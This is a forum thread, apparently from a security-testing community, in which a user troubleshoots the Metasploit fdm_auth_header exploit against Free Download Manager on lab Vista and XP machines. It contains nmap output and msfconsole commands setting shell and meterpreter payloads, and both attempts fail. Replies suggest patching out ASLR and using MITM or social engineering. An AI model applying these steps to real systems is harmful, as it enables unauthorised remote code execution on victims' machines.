Maybe go for a different exploit? Or try it out on a XP box and see if you have issues with the exploit itself or if there might be an issue with Vista.
Playing with Free Download Manager Remote Control Server Buffer Overflow
As I have a fully patched vista box, I was trying to make it vulnerable. My idea was to install the Free Download Manager 2.5 Build 758 in it, so that I can exploit it with my BT3/BT4b Box. Obviously, I am using fdm_auth_header exploit. As payload, I'm happy to get a shell, although meterpreter session is preferred. I tried several payloads including meterpreter, reverse meterpreter, bind tcp, but no luck yet. So, just wondering whether anyone has beter experience... Thanks a lot for your time.
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
Maybe go for a different exploit? Or try it out on a XP box and see if you have issues with the exploit itself or if there might be an issue with Vista.
Tiocfaidh ár lá
Thanks KMDave for the reply.. I think fdm_auth_header is the exploit that should work against download manager. This one clearly says that "This module exploits a stack overflow in Free Download Manager Remote Control 2.5 Build 758. When sending a specially crafted Authorization header, an attacker may be able to execute arbitrary code."
I'll try another time this night with vista, after disabling AV & firewall.
At this moment, I don't have a xp box with me.... If someone have a go with xp, that will be great. Any newbie? pm me please if interested, I'll guide you through. Cheers guys
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
remember Vista got Address Space Randomization, and if it's enabled in FDM you're screwed... you can disable it in the exe of fdm with a hex editor, it's a simple change, (don't remember the address but you can research on the topic)
Update: Tried with vista, after disabling AV & firewall - nothing happens. Nessus scan, as well, doesn't find any vulnerability.
Update2: Managed to get hold of a XP box (unpatched), will try here.
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
Now I'm really stuck, must be missing something completely. Mind that there is no service pack installed on the XP box. Free Download Manager 2.5 Build 758 is running on the box, here is the nmap output from attacker (BT4b):
Here is the unsuccessful exploitation:root@bt:~# nmap -sV -O 192.168.1.5
Starting Nmap 4.68 ( http://nmap.org ) at 2009-05-26 18:16 EDT
Interesting ports on 192.168.1.5:
Not shown: 1712 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
5000/tcp open upnp Microsoft Windows UPnP
MAC Address: 00:1F:1F:08:8E:AE (Edimax Technology Co.)
Device type: general purpose
Running: Microsoft Windows 2000
OS details: Microsoft Windows 2000 SP0/SP2/SP4 or Windows XP SP0/SP1, Microsoft Windows 2000 SP1, Microsoft Windows 2000 SP2
Network Distance: 1 hop
Service Info: OS: Windows
Host script results:
|_ Discover OS Version over NetBIOS and SMB: Windows XP
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.65 seconds
Tried meterpreter payload:msf > use windows/http/fdm_auth_header
msf exploit(fdm_auth_header) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(fdm_auth_header) > set rhost 192.168.1.5
rhost => 192.168.1.5
msf exploit(fdm_auth_header) > exploit
[*] Trying target Free Download Manager 2.5 Build 758...[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (192.168.1.5:80).[*] Exploit completed, but no session was created.
Any idea? What I can see is port 80 is not open.msf exploit(fdm_auth_header) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(fdm_auth_header) > exploit
[*] Trying target Free Download Manager 2.5 Build 758...[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (192.168.1.5:80).[*] Exploit completed, but no session was created.
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
Maybe the downloadmanager has to download the file from the attacking machine? It won't sit and listen for incoming connections usually.
It is the same as with for instance the Quicktime exploit. The victim has to open a specific file or URL in order for an exploit to be sent to him.
Tiocfaidh ár lá
So, should I use MITM attack & SE (I mean, if it was real world) to make the XP box to download someting from the attacker?
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
Posting Permissions